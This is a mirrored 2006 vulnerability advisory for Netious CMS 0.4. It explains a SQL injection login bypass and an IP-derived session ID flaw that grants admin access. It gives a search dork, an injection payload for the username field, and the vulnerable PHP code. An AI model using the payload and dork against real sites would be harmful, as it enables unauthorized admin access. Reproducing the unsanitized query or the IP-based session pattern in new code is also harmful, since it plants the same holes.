Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13694
HistoryAug 02, 2006 - 12:00 a.m.

Netious CMS <= 0.4 SQL Injection and Session Management Vulnerabilities

2006-08-0200:00:00
vulners.com
20
JSON

– Jacek Wlodarczyk (j4ck) - jacekwlo[at]gmail[dot]com –

–Title: Netious CMS <= 0.4 SQL Injection and Session Management Vulnerabilities
–Application: Netious CMS
–Version: 0.4 and below
–Url: http://netious.com/
–Dork: "Powered by netious.com"

#Greetz: Baker

–Affected software description:

–Not properly sanitized input can be used to inject crafted SQL query
–and allow an attacker to log in with admin privileges. Attacker
–can also log in as admin because there is bug in session management.
–Everytime when admin log in with proper credentials, SID is always
–the same for the same IP adress. When admin is logged in, everyone
–with the same IP (using the same subnet, proxy etc.) can go
–to /cms/admin.php and then will have admin rights.
–For SQL Injection magic_quotes_gpc must be off.

–Exploit:

Go -> http://host.com/CMSpath/cms/
Username: j4ck' or 1=1/*
Password: blank

Vulnerable code(SQL Injection):
cms/log.php - lines: 9 - 29:

$result=mysql_query("SELECT AdminId FROM mycmsadmin WHERE username='$username' and password='".sha1($password)."'");
$row=mysql_fetch_row($result);
$num_rows = mysql_num_rows($result);
$id=$row[0];

if ($num_rows==1){
$SID=f_ip2dec($REMOTE_ADDR);
if (!session_id($SID))
session_start();
if (!session_is_registered('signed_in'))
session_register('signed_in');
$signed_in = "indeed";
session_register('uname');
$uname = $username;
session_register('pass');
$pass = $password;

    if &#40;$id==&quot;1&quot;&#41;{
            Header&#40; &quot;Location: admin.php&quot;&#41;;
    }

Vulnerable code 2(Session management):
cms/admin.php - lines: 11 - 27:

$SUID=f_ip2dec($REMOTE_ADDR);
if (!session_id($SUID))
session_start();

$username=$_SESSION['uname'];
$password=$_SESSION['pass'];

$result=mysql_query("SELECT AdminId FROM mycmsadmin WHERE username='$username' and password='".sha1($password)."'");
$row=mysql_fetch_row($result);
$num_rows = mysql_num_rows($result);
$id=$row[0];

if ($_SESSION['signed_in']!='indeed' || $num_rows!=1 || $id!=1){
Header( "Location: index.php?action=2");
}else{ ------------>admin control panel

JSON